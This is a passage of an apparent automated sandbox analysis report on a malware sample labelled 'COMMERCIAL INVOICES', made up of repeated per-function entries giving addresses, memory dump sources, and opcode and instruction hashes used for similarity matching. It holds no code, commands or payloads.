                                                                                                                                                                                                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                                      • Instruction ID: 03230f89bd9195a131449ad94ddb03eff3dc9ae9351a3a75aa9b49092e2d8527
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351943192021AEFEF219A94C885BBEBF75BF00B24F16476DD71267190E7749E40CBA0
                                                                                                                                                                                                                                      Function 01308B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 63a17eb7b995d5e1099c1bb1e4f3a1b2feb430cb1a84f2e458c16b5cd39d1792
                                                                                                                                                                                                                                      • Instruction ID: 88537e699352d0a780712cc791b7b04adf646dccc1717be012c9a92f7314b5d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63a17eb7b995d5e1099c1bb1e4f3a1b2feb430cb1a84f2e458c16b5cd39d1792
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3441C971B01A119BDB2BDB2DC8B4B7BFBEAEF90228F044559E955872D1DB30D801C691
                                                                                                                                                                                                                                      Function 012CCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5e52ce35a3b04ed8b2a0d181a7b104cf91bde8db25401b717794932992d35bcc
                                                                                                                                                                                                                                      • Instruction ID: 27c6235a01063f91002f7730e956a86020be9c4271a0dc19068596cea2801158
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e52ce35a3b04ed8b2a0d181a7b104cf91bde8db25401b717794932992d35bcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E25191B1910216EFCB20DF69C8809AEBBB9FF48B54F154619D649A7304D730AE51CBD0
                                                                                                                                                                                                                                      Function 0127A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b6fd6d57ee051594c2a9f0feb800f8d0b7786a2fdf764444d278c4d349297372
                                                                                                                                                                                                                                      • Instruction ID: 83f28690af09f82a0521add8cc81eb12a3a1190aaf8c52b16da102ab89f8ec99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6fd6d57ee051594c2a9f0feb800f8d0b7786a2fdf764444d278c4d349297372
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7411671B61606DFDB29EF68A8C2B7F3769EB58758F04002CEE02DB241D7F198508754
                                                                                                                                                                                                                                      Function 0130A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                      • Instruction ID: 6bf1f34f4420debaaccd0b4094841c29d4b21e4a80398e20707fad336b45ebd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8041FA726107169FD726CF28D9A0A7AB7E9FF80318B05462EE912876C0EB30ED54C7D0
                                                                                                                                                                                                                                      Function 012701F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5d03d01717317336e5abe618b587228d223db2803fccd733e933d4cd24e048db
                                                                                                                                                                                                                                      • Instruction ID: b3625902877345f89478bde7ba0275f1bdb5742247f6f3ecf2297c170ba1c9e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d03d01717317336e5abe618b587228d223db2803fccd733e933d4cd24e048db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D641CC3292021ADBDB14DF98C480AEFB7B4BF4A700F14812AF915E7240D7749C49CBA8
                                                                                                                                                                                                                                      Function 0126EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9cad6594e1d1ac549f77d8d01147b6cfd4a1f846ffc067ac890b684245447013
                                                                                                                                                                                                                                      • Instruction ID: 26e3e5f85a5402646d5f8f730cb9654c940e4322fb3b158ba2e3094ef72187d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cad6594e1d1ac549f77d8d01147b6cfd4a1f846ffc067ac890b684245447013
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F641C4B1220702DFD725DF28C880A2B77EDFF58314F014829EA57C7695DB74E4848B50
                                                                                                                                                                                                                                      Function 01282750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                                      • Instruction ID: 5e57a0608f5ea235d9a0bb5f00452cb9ea20ef9c3eb0364f8caadc7b0f8b7a2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0517B35A1021ACFCB15CF9CC580AADF7B2FF84750F2481A9DA15A7351D774AE41CB90
                                                                                                                                                                                                                                      Function 01246154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: eccb0cbd2b48b915c67df4b8ab0d2e1f8b1c75b8245d0467ae8ed5d3b9ad72c6
                                                                                                                                                                                                                                      • Instruction ID: 81bec5e1aedb45146727cbac11b2b0b8aee9e783b32c66bf8aef9aa286656941
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eccb0cbd2b48b915c67df4b8ab0d2e1f8b1c75b8245d0467ae8ed5d3b9ad72c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB512AB0920217EFDB29CB28CC41BB8BBB1FF16314F0442A9D629AB2C1D7745981CF44
                                                                                                                                                                                                                                      Function 01240BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3acca1060177d1f63cb0dc581e58169abc28fd7072266ac93b449a1d14556856
                                                                                                                                                                                                                                      • Instruction ID: 6d81f74abef20918adf1743cbdc9c3f11a6f4df173a9dd45d82bce06b0b7bdf4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3acca1060177d1f63cb0dc581e58169abc28fd7072266ac93b449a1d14556856
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED418231A20229DBDF25DF6CC940BEE77B8EF45740F0100A5EA08AB241D7749E80CB95
                                                                                                                                                                                                                                      Function 0130866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                      • Instruction ID: ffd4e81c9b9e5a35fd89c0d6ad4e49e58c5027f97326ebc2da8d711eaa438b9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A41C875F10219ABDB16DF99CCA4ABFBBFAAF84614F1540A9E50097385D670DD00CB90
                                                                                                                                                                                                                                      Function 01240887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fe8cee737c208e1cbb2a057ff31fa6343d50996f47a62a0575b1a01183927992
                                                                                                                                                                                                                                      • Instruction ID: 559fa5835f60216e312a85a88347172690a43b4776302759b8d2797d27e422e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8cee737c208e1cbb2a057ff31fa6343d50996f47a62a0575b1a01183927992
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F41E3B1620702DFE729CF28C580A62B7F9FF49714B144A6DE74787A50E730E885CB98
                                                                                                                                                                                                                                      Function 0126A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c41c8008ec717824af6287d9bf7fa81234b553510a1b1add7fba27f23ea4c3f6
                                                                                                                                                                                                                                      • Instruction ID: b0dbe3b730d7416f773ebc705e517a2dc866046ba9b71947f822029fe2afa187
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c41c8008ec717824af6287d9bf7fa81234b553510a1b1add7fba27f23ea4c3f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A841EE32964216CFDB21DF68E8957AD7BB8FB18310F080155D511BB3C1DB74E984CBA4
                                                                                                                                                                                                                                      Function 01248BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f3e114ae0276917bc5e39620be7b7d16f7e0541540e4b95bba7ee5a69ad22159
                                                                                                                                                                                                                                      • Instruction ID: bba867640b528a39cc70a03f931bd3b31e6338790136f0acb5ab106f184eeb0a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3e114ae0276917bc5e39620be7b7d16f7e0541540e4b95bba7ee5a69ad22159
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F411432A31202CBD72DDF98C880A6ABBB9FF95704F19812EDA019B355D775D842CF94
                                                                                                                                                                                                                                      Function 01238918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 16aebf0553083e8ec91f455d5fea6c44fcc09b87ade38b721b1a5ac1979dec4d
                                                                                                                                                                                                                                      • Instruction ID: 74c03208bedc459029a128f3c59a384a852bdf2e8a67349639be5bd5296f642e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16aebf0553083e8ec91f455d5fea6c44fcc09b87ade38b721b1a5ac1979dec4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 694182725283069FD712DF68D841A6BB7E8EF84B54F400A2EFA80D7250E770DE448B93
                                                                                                                                                                                                                                      Function 0123A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                      • Instruction ID: 8ce34fe2f15165c161687cd6f20c8533d6aaa6dd7cde199849b9bb0316caeb06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A412871A20212DBEF21DE6C9445BBAFB61EBD0754F15807ABA85DB240D6728D40CB90
                                                                                                                                                                                                                                      Function 012409AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 69fb578bd3e7df6613e65f8848bde3ca1336a844bdef8cc3937e0253b42b2454
                                                                                                                                                                                                                                      • Instruction ID: 6ab1794548e280387dab4aa6b49d68b240412d7ed7392f3c76311a81efe118c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69fb578bd3e7df6613e65f8848bde3ca1336a844bdef8cc3937e0253b42b2454
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1418E71620702EFD725CF18D840B66BBF4FF54714F24892AEA49CB251E770E981CB94
                                                                                                                                                                                                                                      Function 01270710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                                      • Instruction ID: b5487db57e3a0a6e080235e708c1349106981465a8eabccfd4ba97c61d7d887a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34411971A10605EFDB24CF98C980AABBBF8FF19700B10496DE656D7691D370EA48CF54
                                                                                                                                                                                                                                      Function 0124262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9498ff0d1da4ab219024b504e2a7a3af87bd33dc7dbad9d2e743bc1275620429
                                                                                                                                                                                                                                      • Instruction ID: eb3851f32ef684878538dd0cab34fbf8b272e41b72bafd08b51b54cafae8f540
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9498ff0d1da4ab219024b504e2a7a3af87bd33dc7dbad9d2e743bc1275620429
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A4107B0521701DFCB2AEF2AE941765BBF5FF88314F10815DE5169B2A1DB309941CF51
                                                                                                                                                                                                                                      Function 0127C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f66845bff751bd87fe85ab374237ef8d463cea8dcfc2400bd54dc57e70e81e63
                                                                                                                                                                                                                                      • Instruction ID: d59499c10a8d8d5df7fd11b86853a47df9b5335678c5a277db5645823c7e41c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66845bff751bd87fe85ab374237ef8d463cea8dcfc2400bd54dc57e70e81e63
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0318CB1A20346DFDB52CF68C0407A9BBF4FB09714F2085AED119EB251D7369902CF90
                                                                                                                                                                                                                                      Function 012C07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 166ec613719b6da1e95e21477f917fccb298497cbadb29c2a6b2aa993890d742
                                                                                                                                                                                                                                      • Instruction ID: 6a618b5632706f7574aaad452a17fa47990f06940b0206605afc61ec6dffb22d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166ec613719b6da1e95e21477f917fccb298497cbadb29c2a6b2aa993890d742
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E417C71524351EFD720DF29C845BABBBE8FF88714F008A2EF69897290D7709904CB96
                                                                                                                                                                                                                                      Function 012380A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 897109db6efb963513f40031d91fdea3b42b5a02d92ee5bf9fe20e2cdf9c6cbe
                                                                                                                                                                                                                                      • Instruction ID: 17e28e47700fe5b2cabd2f82d3f88e02580b0952832beec6c6613a8cfc646fd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897109db6efb963513f40031d91fdea3b42b5a02d92ee5bf9fe20e2cdf9c6cbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB4103B1E34616EFCB11DF18C880AA8B7B1FF94760F208329E955AB280D774ED418BD0
                                                                                                                                                                                                                                      Function 012C05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c0ccf5b02ff92cdfac4ea7f410b698e171bb494245f5483d2917d14a7712e304
                                                                                                                                                                                                                                      • Instruction ID: b94992dea05a87848ce64dce7876559d20580428d78df82d8857da6904669558
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0ccf5b02ff92cdfac4ea7f410b698e171bb494245f5483d2917d14a7712e304
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41C376514652DFC320DF68D840A7AB7E9FFC8B40F24061DFA9597680E730E905C7AA
                                                                                                                                                                                                                                      Function 01244859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f31d760f88d0564539d9edaedc435ac6c8146c9f98ed937c0922d16cbe95884c
                                                                                                                                                                                                                                      • Instruction ID: 2bfcd0c1bd08828e39effc7d94a0901f7b15de4f544bbd334083d24364fdc246
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f31d760f88d0564539d9edaedc435ac6c8146c9f98ed937c0922d16cbe95884c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41D3756203438FE729EF28D884B3ABBE9FF80364F14442DEA458B2A1DB70D901DB51
                                                                                                                                                                                                                                      Function 01238B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
